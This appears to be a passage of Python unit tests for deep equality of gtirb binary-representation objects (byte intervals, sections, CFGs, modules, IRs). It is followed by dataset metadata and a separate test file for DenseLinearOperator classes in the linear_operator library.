symbol2=gtirb.Symbol(name="name2", payload=None, uuid=id2),
)
self.assertFalse(s1.deep_eq(s2))
s1 = gtirb.SymAddrAddr(
offset=1,
scale=2,
symbol1=gtirb.Symbol(name="name1", payload=None, uuid=id1),
symbol2=gtirb.Symbol(name="name2", payload=None, uuid=id2),
)
s2 = gtirb.SymAddrAddr(
offset=1,
scale=2,
symbol1=gtirb.Symbol(name="name1", payload=None, uuid=id1),
symbol2=gtirb.Symbol(name="name3", payload=None, uuid=id2),
)
self.assertFalse(s1.deep_eq(s2))
s1 = gtirb.SymAddrAddr(
offset=1,
scale=2,
symbol1=gtirb.Symbol(name="name1", payload=None, uuid=id1),
symbol2=gtirb.Symbol(name="name2", payload=None, uuid=id2),
attributes={gtirb.SymbolicExpression.Attribute.Part1},
)
s2 = gtirb.SymAddrAddr(
offset=1,
scale=2,
symbol1=gtirb.Symbol(name="name1", payload=None, uuid=id1),
symbol2=gtirb.Symbol(name="name2", payload=None, uuid=id2),
)
self.assertFalse(s1.deep_eq(s2))
def test_byte_intervals(self):
id1 = uuid.uuid4()
id2 = uuid.uuid4()
id3 = uuid.uuid4()
id4 = uuid.uuid4()
id6 = uuid.uuid4()
b1 = gtirb.ByteInterval(
address=1,
contents=b"abcd",
size=4,
initialized_size=4,
blocks=(
gtirb.DataBlock(size=1, offset=3, uuid=id2),
gtirb.CodeBlock(size=1, decode_mode=2, offset=3, uuid=id3),
),
symbolic_expressions={
2: gtirb.SymAddrConst(
3, gtirb.Symbol(name="name1", payload=4, uuid=id4)
),
},
uuid=id1,
)
b2 = gtirb.ByteInterval(
address=1,
contents=b"abcd",
size=4,
initialized_size=4,
blocks=(
gtirb.DataBlock(size=1, offset=3, uuid=id2),
gtirb.CodeBlock(size=1, decode_mode=2, offset=3, uuid=id3),
),
symbolic_expressions={
2: gtirb.SymAddrConst(
3, gtirb.Symbol(name="name1", payload=4, uuid=id4)
),
},
uuid=id1,
)
self.assertTrue(b1.deep_eq(b2))
b2 = gtirb.ByteInterval(
address=None,
contents=b"abcd",
size=4,
initialized_size=4,
blocks=(
gtirb.DataBlock(size=1, offset=3, uuid=id2),
gtirb.CodeBlock(size=1, decode_mode=2, offset=3, uuid=id3),
),
symbolic_expressions={
2: gtirb.SymAddrConst(
3, gtirb.Symbol(name="name1", payload=4, uuid=id4)
),
},
uuid=id1,
)
self.assertFalse(b1.deep_eq(b2))
b2 = gtirb.ByteInterval(
address=1,
contents=b"1234",
size=4,
initialized_size=4,
blocks=(
gtirb.DataBlock(size=1, offset=3, uuid=id2),
gtirb.CodeBlock(size=1, decode_mode=2, offset=3, uuid=id3),
),
symbolic_expressions={
2: gtirb.SymAddrConst(
3, gtirb.Symbol(name="name1", payload=4, uuid=id4)
),
},
uuid=id1,
)
self.assertFalse(b1.deep_eq(b2))
b2 = gtirb.ByteInterval(
address=1,
contents=b"abcd",
size=8,
initialized_size=4,
blocks=(
gtirb.DataBlock(size=1, offset=3, uuid=id2),
gtirb.CodeBlock(size=1, decode_mode=2, offset=3, uuid=id3),
),
symbolic_expressions={
2: gtirb.SymAddrConst(
3, gtirb.Symbol(name="name1", payload=4, uuid=id4)
),
},
uuid=id1,
)
self.assertFalse(b1.deep_eq(b2))
b2 = gtirb.ByteInterval(
address=1,
contents=b"abcd",
size=4,
initialized_size=0,
blocks=(
gtirb.DataBlock(size=1, offset=3, uuid=id2),
gtirb.CodeBlock(size=1, decode_mode=2, offset=3, uuid=id3),
),
symbolic_expressions={
2: gtirb.SymAddrConst(
3, gtirb.Symbol(name="name1", payload=4, uuid=id4)
),
},
uuid=id1,
)
self.assertFalse(b1.deep_eq(b2))
b2 = gtirb.ByteInterval(
address=1,
contents=b"abcd",
size=4,
initialized_size=4,
blocks=(
gtirb.DataBlock(size=1, offset=3, uuid=id2),
gtirb.CodeBlock(size=1, decode_mode=5, offset=3, uuid=id3),
),
symbolic_expressions={
2: gtirb.SymAddrConst(
3, gtirb.Symbol(name="name1", payload=4, uuid=id4)
),
},
uuid=id1,
)
self.assertFalse(b1.deep_eq(b2))
b2 = gtirb.ByteInterval(
address=1,
contents=b"abcd",
size=4,
initialized_size=4,
blocks=(
gtirb.CodeBlock(size=1, decode_mode=2, offset=3, uuid=id3),
),
symbolic_expressions={
2: gtirb.SymAddrConst(
3, gtirb.Symbol(name="name1", payload=4, uuid=id4)
),
},
uuid=id1,
)
self.assertFalse(b1.deep_eq(b2))
b2 = gtirb.ByteInterval(
address=1,
contents=b"abcd",
size=4,
initialized_size=4,
blocks=(
gtirb.DataBlock(size=1, offset=3, uuid=id2),
gtirb.CodeBlock(size=1, decode_mode=2, offset=3, uuid=id3),
),
symbolic_expressions={
2: gtirb.SymAddrConst(
6, gtirb.Symbol(name="name1", payload=4, uuid=id4)
),
},
uuid=id1,
)
self.assertFalse(b1.deep_eq(b2))
b2 = gtirb.ByteInterval(
address=1,
contents=b"abcd",
size=4,
initialized_size=4,
blocks=(
gtirb.DataBlock(size=1, offset=3, uuid=id2),
gtirb.CodeBlock(size=1, decode_mode=2, offset=3, uuid=id3),
),
symbolic_expressions={
2: gtirb.SymAddrConst(
3, gtirb.Symbol(name="name1", payload=4, uuid=id4)
)
},
uuid=id1,
)
self.assertTrue(b1.deep_eq(b2))
b2 = gtirb.ByteInterval(
address=1,
contents=b"abcd",
size=4,
initialized_size=4,
blocks=(
gtirb.DataBlock(size=1, offset=3, uuid=id2),
gtirb.CodeBlock(size=1, decode_mode=2, offset=3, uuid=id3),
),
symbolic_expressions={
7: gtirb.SymAddrConst(
3, gtirb.Symbol(name="name1", payload=4, uuid=id4)
),
},
uuid=id1,
)
self.assertFalse(b1.deep_eq(b2))
b2 = gtirb.ByteInterval(
address=1,
contents=b"abcd",
size=4,
initialized_size=4,
blocks=(
gtirb.DataBlock(size=1, offset=3, uuid=id2),
gtirb.CodeBlock(size=1, decode_mode=2, offset=3, uuid=id3),
),
symbolic_expressions={
2: gtirb.SymAddrConst(
3, gtirb.Symbol(name="name1", payload=4, uuid=id4)
),
},
uuid=id6,
)
self.assertFalse(b1.deep_eq(b2))
def test_sections(self):
id1 = uuid.uuid4()
id2 = uuid.uuid4()
id3 = uuid.uuid4()
id4 = uuid.uuid4()
s1 = gtirb.Section(
name="name",
byte_intervals=(
gtirb.ByteInterval(contents=b"abcd", uuid=id2),
gtirb.ByteInterval(contents=b"1234", uuid=id3),
),
flags=(gtirb.Section.Flag.Readable, gtirb.Section.Flag.Writable),
uuid=id1,
)
s2 = gtirb.Section(
name="name",
byte_intervals=(
gtirb.ByteInterval(contents=b"abcd", uuid=id2),
gtirb.ByteInterval(contents=b"1234", uuid=id3),
),
flags=(gtirb.Section.Flag.Readable, gtirb.Section.Flag.Writable),
uuid=id1,
)
self.assertTrue(s1.deep_eq(s2))
s2 = gtirb.Section(
name="name2",
byte_intervals=(
gtirb.ByteInterval(contents=b"abcd", uuid=id2),
gtirb.ByteInterval(contents=b"1234", uuid=id3),
),
flags=(gtirb.Section.Flag.Readable, gtirb.Section.Flag.Writable),
uuid=id1,
)
self.assertFalse(s1.deep_eq(s2))
s2 = gtirb.Section(
name="name",
byte_intervals=(
gtirb.ByteInterval(contents=b"abcd", uuid=id2),
gtirb.ByteInterval(contents=b"12345", uuid=id3),
),
flags=(gtirb.Section.Flag.Readable, gtirb.Section.Flag.Writable),
uuid=id1,
)
self.assertFalse(s1.deep_eq(s2))
s2 = gtirb.Section(
name="name",
byte_intervals=(gtirb.ByteInterval(contents=b"abcd", uuid=id2),),
flags=(gtirb.Section.Flag.Readable, gtirb.Section.Flag.Writable),
uuid=id1,
)
self.assertFalse(s1.deep_eq(s2))
s2 = gtirb.Section(
name="name",
byte_intervals=(
gtirb.ByteInterval(contents=b"abcd", uuid=id2),
gtirb.ByteInterval(contents=b"1234", uuid=id3),
),
flags=(gtirb.Section.Flag.Writable,),
uuid=id1,
)
self.assertFalse(s1.deep_eq(s2))
s2 = gtirb.Section(
name="name",
byte_intervals=(
gtirb.ByteInterval(contents=b"abcd", uuid=id2),
gtirb.ByteInterval(contents=b"1234", uuid=id3),
),
flags=(
gtirb.Section.Flag.Readable,
gtirb.Section.Flag.Writable,
gtirb.Section.Flag.Loaded,
),
uuid=id1,
)
self.assertFalse(s1.deep_eq(s2))
s2 = gtirb.Section(
name="name",
byte_intervals=(
gtirb.ByteInterval(contents=b"abcd", uuid=id2),
gtirb.ByteInterval(contents=b"1234", uuid=id3),
),
flags=(gtirb.Section.Flag.Readable, gtirb.Section.Flag.Writable),
uuid=id4,
)
self.assertFalse(s1.deep_eq(s2))
def test_cfg(self):
id1 = uuid.uuid4()
id2 = uuid.uuid4()
e1 = gtirb.CFG(
[
gtirb.Edge(
gtirb.CodeBlock(size=1, uuid=id1),
gtirb.CodeBlock(size=2, uuid=id2),
gtirb.Edge.Label(
type=gtirb.Edge.Type.Branch,
conditional=True,
direct=False,
),
)
]
)
self.assertFalse(
e1.deep_eq(
[
gtirb.Edge(
gtirb.CodeBlock(size=1, uuid=id1),
gtirb.CodeBlock(size=2, uuid=id2),
gtirb.Edge.Label(
type=gtirb.Edge.Type.Branch,
conditional=True,
direct=False,
),
)
]
)
)
e2 = gtirb.CFG(
[
gtirb.Edge(
gtirb.CodeBlock(size=1, uuid=id1),
gtirb.CodeBlock(size=2, uuid=id2),
gtirb.Edge.Label(
type=gtirb.Edge.Type.Branch,
conditional=True,
direct=False,
),
)
]
)
self.assertTrue(e1.deep_eq(e2))
e2 = gtirb.CFG(
[
gtirb.Edge(
gtirb.CodeBlock(size=3, uuid=id1),
gtirb.CodeBlock(size=2, uuid=id2),
gtirb.Edge.Label(
type=gtirb.Edge.Type.Branch,
conditional=True,
direct=False,
),
)
]
)
self.assertFalse(e1.deep_eq(e2))
e2 = gtirb.CFG(
[
gtirb.Edge(
gtirb.CodeBlock(size=1, uuid=id1),
gtirb.CodeBlock(size=3, uuid=id2),
gtirb.Edge.Label(
type=gtirb.Edge.Type.Branch,
conditional=True,
direct=False,
),
)
]
)
self.assertFalse(e1.deep_eq(e2))
e2 = gtirb.CFG(
[
gtirb.Edge(
gtirb.CodeBlock(size=1, uuid=id1),
gtirb.CodeBlock(size=2, uuid=id2),
gtirb.Edge.Label(
type=gtirb.Edge.Type.Fallthrough,
conditional=True,
direct=False,
),
)
]
)
self.assertFalse(e1.deep_eq(e2))
e2 = gtirb.CFG(
[
gtirb.Edge(
gtirb.CodeBlock(size=1, uuid=id1),
gtirb.CodeBlock(size=2, uuid=id2),
gtirb.Edge.Label(
type=gtirb.Edge.Type.Branch,
conditional=False,
direct=False,
),
)
]
)
self.assertFalse(e1.deep_eq(e2))
e2 = gtirb.CFG(
[
gtirb.Edge(
gtirb.CodeBlock(size=1, uuid=id1),
gtirb.CodeBlock(size=2, uuid=id2),
gtirb.Edge.Label(
type=gtirb.Edge.Type.Branch,
conditional=True,
direct=True,
),
)
]
)
self.assertFalse(e1.deep_eq(e2))
def test_module(self):
id1 = uuid.uuid4()
id2 = uuid.uuid4()
id3 = uuid.uuid4()
id4 = uuid.uuid4()
id5 = uuid.uuid4()
id6 = uuid.uuid4()
id7 = uuid.uuid4()
id8 = uuid.uuid4()
m1 = gtirb.Module(
aux_data={"key": gtirb.AuxData("value", "string")},
binary_path="binary_path",
file_format=gtirb.Module.FileFormat.ELF,
isa=gtirb.Module.ISA.X64,
name="name",
preferred_addr=1,
rebase_delta=2,
entry_point=gtirb.CodeBlock(size=1, uuid=id2),
proxies=(gtirb.ProxyBlock(uuid=id3), gtirb.ProxyBlock(uuid=id4)),
symbols=(
gtirb.Symbol(name="sym1", uuid=id5),
gtirb.Symbol(name="sym2", uuid=id6),
),
sections=(
gtirb.Section(name="sect1", uuid=id7),
gtirb.Section(name="sect2", uuid=id8),
),
uuid=id1,
)
m2 = gtirb.Module(
aux_data={"key": gtirb.AuxData("value", "string")},
binary_path="binary_path",
file_format=gtirb.Module.FileFormat.ELF,
isa=gtirb.Module.ISA.X64,
name="name",
preferred_addr=1,
rebase_delta=2,
entry_point=gtirb.CodeBlock(size=1, uuid=id2),
proxies=(gtirb.ProxyBlock(uuid=id3), gtirb.ProxyBlock(uuid=id4)),
symbols=(
gtirb.Symbol(name="sym1", uuid=id5),
gtirb.Symbol(name="sym2", uuid=id6),
),
sections=(
gtirb.Section(name="sect1", uuid=id7),
gtirb.Section(name="sect2", uuid=id8),
),
uuid=id1,
)
self.assertTrue(m1.deep_eq(m2))
m2 = gtirb.Module(
aux_data={"key": gtirb.AuxData("other_value", "string")},
binary_path="binary_path",
file_format=gtirb.Module.FileFormat.ELF,
isa=gtirb.Module.ISA.X64,
name="name",
preferred_addr=1,
rebase_delta=2,
entry_point=gtirb.CodeBlock(size=1, uuid=id2),
proxies=(gtirb.ProxyBlock(uuid=id3), gtirb.ProxyBlock(uuid=id4)),
symbols=(
gtirb.Symbol(name="sym1", uuid=id5),
gtirb.Symbol(name="sym2", uuid=id6),
),
sections=(
gtirb.Section(name="sect1", uuid=id7),
gtirb.Section(name="sect2", uuid=id8),
),
uuid=id1,
)
self.assertTrue(m1.deep_eq(m2))
m2 = gtirb.Module(
aux_data={"key": gtirb.AuxData("value", "string")},
binary_path="other_binary_path",
file_format=gtirb.Module.FileFormat.ELF,
isa=gtirb.Module.ISA.X64,
name="name",
preferred_addr=1,
rebase_delta=2,
entry_point=gtirb.CodeBlock(size=1, uuid=id2),
proxies=(gtirb.ProxyBlock(uuid=id3), gtirb.ProxyBlock(uuid=id4)),
symbols=(
gtirb.Symbol(name="sym1", uuid=id5),
gtirb.Symbol(name="sym2", uuid=id6),
),
sections=(
gtirb.Section(name="sect1", uuid=id7),
gtirb.Section(name="sect2", uuid=id8),
),
uuid=id1,
)
self.assertFalse(m1.deep_eq(m2))
m2 = gtirb.Module(
aux_data={"key": gtirb.AuxData("value", "string")},
binary_path="binary_path",
file_format=gtirb.Module.FileFormat.PE,
isa=gtirb.Module.ISA.X64,
name="name",
preferred_addr=1,
rebase_delta=2,
entry_point=gtirb.CodeBlock(size=1, uuid=id2),
proxies=(gtirb.ProxyBlock(uuid=id3), gtirb.ProxyBlock(uuid=id4)),
symbols=(
gtirb.Symbol(name="sym1", uuid=id5),
gtirb.Symbol(name="sym2", uuid=id6),
),
sections=(
gtirb.Section(name="sect1", uuid=id7),
gtirb.Section(name="sect2", uuid=id8),
),
uuid=id1,
)
self.assertFalse(m1.deep_eq(m2))
m2 = gtirb.Module(
aux_data={"key": gtirb.AuxData("value", "string")},
binary_path="binary_path",
file_format=gtirb.Module.FileFormat.ELF,
isa=gtirb.Module.ISA.ARM,
name="name",
preferred_addr=1,
rebase_delta=2,
entry_point=gtirb.CodeBlock(size=1, uuid=id2),
proxies=(gtirb.ProxyBlock(uuid=id3), gtirb.ProxyBlock(uuid=id4)),
symbols=(
gtirb.Symbol(name="sym1", uuid=id5),
gtirb.Symbol(name="sym2", uuid=id6),
),
sections=(
gtirb.Section(name="sect1", uuid=id7),
gtirb.Section(name="sect2", uuid=id8),
),
uuid=id1,
)
self.assertFalse(m1.deep_eq(m2))
m2 = gtirb.Module(
aux_data={"key": gtirb.AuxData("value", "string")},
binary_path="binary_path",
file_format=gtirb.Module.FileFormat.ELF,
isa=gtirb.Module.ISA.X64,
name="other_name",
preferred_addr=1,
rebase_delta=2,
entry_point=gtirb.CodeBlock(size=1, uuid=id2),
proxies=(gtirb.ProxyBlock(uuid=id3), gtirb.ProxyBlock(uuid=id4)),
symbols=(
gtirb.Symbol(name="sym1", uuid=id5),
gtirb.Symbol(name="sym2", uuid=id6),
),
sections=(
gtirb.Section(name="sect1", uuid=id7),
gtirb.Section(name="sect2", uuid=id8),
),
uuid=id1,
)
self.assertFalse(m1.deep_eq(m2))
m2 = gtirb.Module(
aux_data={"key": gtirb.AuxData("value", "string")},
binary_path="binary_path",
file_format=gtirb.Module.FileFormat.ELF,
isa=gtirb.Module.ISA.X64,
name="name",
preferred_addr=5,
rebase_delta=2,
entry_point=gtirb.CodeBlock(size=1, uuid=id2),
proxies=(gtirb.ProxyBlock(uuid=id3), gtirb.ProxyBlock(uuid=id4)),
symbols=(
gtirb.Symbol(name="sym1", uuid=id5),
gtirb.Symbol(name="sym2", uuid=id6),
),
sections=(
gtirb.Section(name="sect1", uuid=id7),
gtirb.Section(name="sect2", uuid=id8),
),
uuid=id1,
)
self.assertFalse(m1.deep_eq(m2))
m2 = gtirb.Module(
aux_data={"key": gtirb.AuxData("value", "string")},
binary_path="binary_path",
file_format=gtirb.Module.FileFormat.ELF,
isa=gtirb.Module.ISA.X64,
name="name",
preferred_addr=1,
rebase_delta=5,
entry_point=gtirb.CodeBlock(size=1, uuid=id2),
proxies=(gtirb.ProxyBlock(uuid=id3), gtirb.ProxyBlock(uuid=id4)),
symbols=(
gtirb.Symbol(name="sym1", uuid=id5),
gtirb.Symbol(name="sym2", uuid=id6),
),
sections=(
gtirb.Section(name="sect1", uuid=id7),
gtirb.Section(name="sect2", uuid=id8),
),
uuid=id1,
)
self.assertFalse(m1.deep_eq(m2))
m2 = gtirb.Module(
aux_data={"key": gtirb.AuxData("value", "string")},
binary_path="binary_path",
file_format=gtirb.Module.FileFormat.ELF,
isa=gtirb.Module.ISA.X64,
name="name",
preferred_addr=1,
rebase_delta=2,
entry_point=gtirb.CodeBlock(size=2, uuid=id2),
proxies=(gtirb.ProxyBlock(uuid=id3), gtirb.ProxyBlock(uuid=id4)),
symbols=(
gtirb.Symbol(name="sym1", uuid=id5),
gtirb.Symbol(name="sym2", uuid=id6),
),
sections=(
gtirb.Section(name="sect1", uuid=id7),
gtirb.Section(name="sect2", uuid=id8),
),
uuid=id1,
)
self.assertFalse(m1.deep_eq(m2))
m2 = gtirb.Module(
aux_data={"key": gtirb.AuxData("value", "string")},
binary_path="binary_path",
file_format=gtirb.Module.FileFormat.ELF,
isa=gtirb.Module.ISA.X64,
name="name",
preferred_addr=1,
rebase_delta=2,
entry_point=gtirb.CodeBlock(size=1, uuid=id2),
proxies=(gtirb.ProxyBlock(uuid=id4), gtirb.ProxyBlock(uuid=id4)),
symbols=(
gtirb.Symbol(name="sym1", uuid=id5),
gtirb.Symbol(name="sym2", uuid=id6),
),
sections=(
gtirb.Section(name="sect1", uuid=id7),
gtirb.Section(name="sect2", uuid=id8),
),
uuid=id1,
)
self.assertFalse(m1.deep_eq(m2))
m2 = gtirb.Module(
aux_data={"key": gtirb.AuxData("value", "string")},
binary_path="binary_path",
file_format=gtirb.Module.FileFormat.ELF,
isa=gtirb.Module.ISA.X64,
name="name",
preferred_addr=1,
rebase_delta=2,
entry_point=gtirb.CodeBlock(size=1, uuid=id2),
proxies=(gtirb.ProxyBlock(uuid=id4),),
symbols=(
gtirb.Symbol(name="sym1", uuid=id5),
gtirb.Symbol(name="sym2", uuid=id6),
),
sections=(
gtirb.Section(name="sect1", uuid=id7),
gtirb.Section(name="sect2", uuid=id8),
),
uuid=id1,
)
self.assertFalse(m1.deep_eq(m2))
m2 = gtirb.Module(
aux_data={"key": gtirb.AuxData("value", "string")},
binary_path="binary_path",
file_format=gtirb.Module.FileFormat.ELF,
isa=gtirb.Module.ISA.X64,
name="name",
preferred_addr=1,
rebase_delta=2,
entry_point=gtirb.CodeBlock(size=1, uuid=id2),
proxies=(gtirb.ProxyBlock(uuid=id3), gtirb.ProxyBlock(uuid=id4)),
symbols=(
gtirb.Symbol(name="sym11", uuid=id5),
gtirb.Symbol(name="sym2", uuid=id6),
),
sections=(
gtirb.Section(name="sect1", uuid=id7),
gtirb.Section(name="sect2", uuid=id8),
),
uuid=id1,
)
self.assertFalse(m1.deep_eq(m2))
m2 = gtirb.Module(
aux_data={"key": gtirb.AuxData("value", "string")},
binary_path="binary_path",
file_format=gtirb.Module.FileFormat.ELF,
isa=gtirb.Module.ISA.X64,
name="name",
preferred_addr=1,
rebase_delta=2,
entry_point=gtirb.CodeBlock(size=1, uuid=id2),
proxies=(gtirb.ProxyBlock(uuid=id3), gtirb.ProxyBlock(uuid=id4)),
symbols=(gtirb.Symbol(name="sym1", uuid=id5),),
sections=(
gtirb.Section(name="sect1", uuid=id7),
gtirb.Section(name="sect2", uuid=id8),
),
uuid=id1,
)
self.assertFalse(m1.deep_eq(m2))
m2 = gtirb.Module(
aux_data={"key": gtirb.AuxData("value", "string")},
binary_path="binary_path",
file_format=gtirb.Module.FileFormat.ELF,
isa=gtirb.Module.ISA.X64,
name="name",
preferred_addr=1,
rebase_delta=2,
entry_point=gtirb.CodeBlock(size=1, uuid=id2),
proxies=(gtirb.ProxyBlock(uuid=id3), gtirb.ProxyBlock(uuid=id4)),
symbols=(
gtirb.Symbol(name="sym1", uuid=id5),
gtirb.Symbol(name="sym2", uuid=id6),
),
sections=(
gtirb.Section(name="sect1", uuid=id7),
gtirb.Section(name="sect22", uuid=id8),
),
uuid=id1,
)
self.assertFalse(m1.deep_eq(m2))
m2 = gtirb.Module(
aux_data={"key": gtirb.AuxData("value", "string")},
binary_path="binary_path",
file_format=gtirb.Module.FileFormat.ELF,
isa=gtirb.Module.ISA.X64,
name="name",
preferred_addr=1,
rebase_delta=2,
entry_point=gtirb.CodeBlock(size=1, uuid=id2),
proxies=(gtirb.ProxyBlock(uuid=id3), gtirb.ProxyBlock(uuid=id4)),
symbols=(
gtirb.Symbol(name="sym1", uuid=id5),
gtirb.Symbol(name="sym2", uuid=id6),
),
sections=(gtirb.Section(name="sect2", uuid=id8),),
uuid=id1,
)
self.assertFalse(m1.deep_eq(m2))
m2 = gtirb.Module(
aux_data={"key": gtirb.AuxData("value", "string")},
binary_path="binary_path",
file_format=gtirb.Module.FileFormat.ELF,
isa=gtirb.Module.ISA.X64,
name="name",
preferred_addr=1,
rebase_delta=2,
entry_point=gtirb.CodeBlock(size=1, uuid=id2),
proxies=(gtirb.ProxyBlock(uuid=id3), gtirb.ProxyBlock(uuid=id4)),
symbols=(
gtirb.Symbol(name="sym1", uuid=id5),
gtirb.Symbol(name="sym2", uuid=id6),
),
sections=(
gtirb.Section(name="sect1", uuid=id7),
gtirb.Section(name="sect2", uuid=id8),
),
uuid=id2,
)
self.assertFalse(m1.deep_eq(m2))
def test_ir(self):
id1 = uuid.uuid4()
id2 = uuid.uuid4()
id3 = uuid.uuid4()
id4 = uuid.uuid4()
id5 = uuid.uuid4()
id6 = uuid.uuid4()
id7 = uuid.uuid4()
id8 = uuid.uuid4()
ir1 = gtirb.IR(
modules=(
gtirb.Module(name="m1", uuid=id2),
gtirb.Module(name="m2", uuid=id3),
),
aux_data={"key": gtirb.AuxData("value", "string")},
cfg=(
gtirb.Edge(
gtirb.CodeBlock(size=1, uuid=id4),
gtirb.CodeBlock(size=2, uuid=id5),
),
gtirb.Edge(
gtirb.CodeBlock(size=3, uuid=id6),
gtirb.CodeBlock(size=4, uuid=id7),
),
),
version=1,
uuid=id1,
)
ir2 = gtirb.IR(
modules=(
gtirb.Module(name="m1", uuid=id2),
gtirb.Module(name="m2", uuid=id3),
),
aux_data={"key": gtirb.AuxData("value", "string")},
cfg=(
gtirb.Edge(
gtirb.CodeBlock(size=1, uuid=id4),
gtirb.CodeBlock(size=2, uuid=id5),
),
gtirb.Edge(
gtirb.CodeBlock(size=3, uuid=id6),
gtirb.CodeBlock(size=4, uuid=id7),
),
),
version=1,
uuid=id1,
)
self.assertTrue(ir1.deep_eq(ir2))
ir2 = gtirb.IR(
modules=(
gtirb.Module(name="m1", uuid=id2),
gtirb.Module(name="m2", uuid=id3),
),
aux_data={"key": gtirb.AuxData("other_value", "string")},
cfg=(
gtirb.Edge(
gtirb.CodeBlock(size=1, uuid=id4),
gtirb.CodeBlock(size=2, uuid=id5),
),
gtirb.Edge(
gtirb.CodeBlock(size=3, uuid=id6),
gtirb.CodeBlock(size=4, uuid=id7),
),
),
version=1,
uuid=id1,
)
self.assertTrue(ir1.deep_eq(ir2))
ir2 = gtirb.IR(
modules=(
gtirb.Module(name="m11", uuid=id2),
gtirb.Module(name="m2", uuid=id3),
),
aux_data={"key": gtirb.AuxData("value", "string")},
cfg=(
gtirb.Edge(
gtirb.CodeBlock(size=1, uuid=id4),
gtirb.CodeBlock(size=2, uuid=id5),
),
gtirb.Edge(
gtirb.CodeBlock(size=3, uuid=id6),
gtirb.CodeBlock(size=4, uuid=id7),
),
),
version=1,
uuid=id1,
)
self.assertFalse(ir1.deep_eq(ir2))
ir2 = gtirb.IR(
modules=(gtirb.Module(name="m1", uuid=id2),),
aux_data={"key": gtirb.AuxData("value", "string")},
cfg=(
gtirb.Edge(
gtirb.CodeBlock(size=1, uuid=id4),
gtirb.CodeBlock(size=2, uuid=id5),
),
gtirb.Edge(
gtirb.CodeBlock(size=3, uuid=id6),
gtirb.CodeBlock(size=4, uuid=id7),
),
),
version=1,
uuid=id1,
)
self.assertFalse(ir1.deep_eq(ir2))
ir2 = gtirb.IR(
modules=(
gtirb.Module(name="m1", uuid=id2),
gtirb.Module(name="m2", uuid=id3),
),
aux_data={"key": gtirb.AuxData("value", "string")},
cfg=(
gtirb.Edge(
gtirb.CodeBlock(size=55, uuid=id4),
gtirb.CodeBlock(size=2, uuid=id5),
),
gtirb.Edge(
gtirb.CodeBlock(size=3, uuid=id6),
gtirb.CodeBlock(size=4, uuid=id7),
),
),
version=1,
uuid=id1,
)
self.assertFalse(ir1.deep_eq(ir2))
ir2 = gtirb.IR(
modules=(
gtirb.Module(name="m1", uuid=id2),
gtirb.Module(name="m2", uuid=id3),
),
aux_data={"key": gtirb.AuxData("value", "string")},
cfg=(
gtirb.Edge(
gtirb.CodeBlock(size=3, uuid=id6),
gtirb.CodeBlock(size=4, uuid=id7),
),
),
version=1,
uuid=id1,
)
self.assertFalse(ir1.deep_eq(ir2))
ir2 = gtirb.IR(
modules=(
gtirb.Module(name="m1", uuid=id2),
gtirb.Module(name="m2", uuid=id3),
),
aux_data={"key": gtirb.AuxData("value", "string")},
cfg=(
gtirb.Edge(
gtirb.CodeBlock(size=1, uuid=id4),
gtirb.CodeBlock(size=2, uuid=id5),
),
gtirb.Edge(
gtirb.CodeBlock(size=3, uuid=id6),
gtirb.CodeBlock(size=4, uuid=id7),
),
),
version=5,
uuid=id1,
)
self.assertFalse(ir1.deep_eq(ir2))
ir2 = gtirb.IR(
modules=(
gtirb.Module(name="m1", uuid=id2),
gtirb.Module(name="m2", uuid=id3),
),
aux_data={"key": gtirb.AuxData("value", "string")},
cfg=(
gtirb.Edge(
gtirb.CodeBlock(size=1, uuid=id4),
gtirb.CodeBlock(size=2, uuid=id5),
),
gtirb.Edge(
gtirb.CodeBlock(size=3, uuid=id6),
gtirb.CodeBlock(size=4, uuid=id7),
),
),
version=1,
uuid=id8,
)
self.assertFalse(ir1.deep_eq(ir2))
if __name__ == "__main__":
unittest.main()
| 33.41371 | 79 | 0.478121 | 4,230 | 41,433 | 4.615603 | 0.032861 | 0.035136 | 0.069914 | 0.048658 | 0.980742 | 0.980025 | 0.97603 | 0.971215 | 0.960049 | 0.956976 | 0 | 0.047851 | 0.390703 | 41,433 | 1,239 | 80 | 33.440678 | 0.72553 | 0.000579 | 0 | 0.816754 | 0 | 0 | 0.033787 | 0 | 0 | 0 | 0 | 0 | 0.06719 | 1 | 0.008726 | false | 0 | 0.002618 | 0 | 0.012216 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
168a44bb51a6ff0befdbd2800ba0f28315b5e004 | 1,848 | py | Python | test/operators/test_dense_linear_operator.py | gpleiss/linear_operator | a80f82ff6cdd10c493fa8344a146cf539ec7a092 | [
"MIT"
] | 2 | 2021-09-03T22:49:17.000Z | 2022-03-01T21:14:34.000Z | test/operators/test_dense_linear_operator.py | gpleiss/linear_operator | a80f82ff6cdd10c493fa8344a146cf539ec7a092 | [
"MIT"
] | 1 | 2021-09-23T14:45:30.000Z | 2021-09-23T14:45:30.000Z | test/operators/test_dense_linear_operator.py | gpleiss/linear_operator | a80f82ff6cdd10c493fa8344a146cf539ec7a092 | [
"MIT"
] | null | null | null | #!/usr/bin/env python3
from __future__ import annotations
import unittest
import torch
from linear_operator.operators import DenseLinearOperator
from linear_operator.test.linear_operator_test_case import LinearOperatorTestCase, SymmetricLinearOperatorTestCase
class TestDenseLinearOperator(LinearOperatorTestCase, unittest.TestCase):
seed = 0
def create_linear_operator(self):
torch.manual_seed(0)
mat = torch.randn(5, 6)
mat.requires_grad_(True)
return DenseLinearOperator(mat)
def evaluate_linear_operator(self, linear_operator):
return linear_operator.tensor
class TestDenseLinearOperatorMultiBatch(LinearOperatorTestCase, unittest.TestCase):
seed = 0
def create_linear_operator(self):
torch.manual_seed(0)
mat = torch.randn(2, 3, 5, 6)
mat.requires_grad_(True)
return DenseLinearOperator(mat)
def evaluate_linear_operator(self, linear_operator):
return linear_operator.tensor
class TestSymmetricDenseLinearOperator(SymmetricLinearOperatorTestCase, unittest.TestCase):
seed = 0
def create_linear_operator(self):
torch.manual_seed(0)
mat = torch.randn(5, 6)
mat = mat @ mat.transpose(-1, -2)
mat.requires_grad_(True)
return DenseLinearOperator(mat)
def evaluate_linear_operator(self, linear_operator):
return linear_operator.tensor
class TestSymmetricDenseLinearOperatorMultiBatch(SymmetricLinearOperatorTestCase, unittest.TestCase):
seed = 0
def create_linear_operator(self):
torch.manual_seed(0)
mat = torch.randn(2, 3, 5, 6)
mat = mat @ mat.transpose(-1, -2)
mat.requires_grad_(True)
return DenseLinearOperator(mat)
def evaluate_linear_operator(self, linear_operator):
return linear_operator.tensor
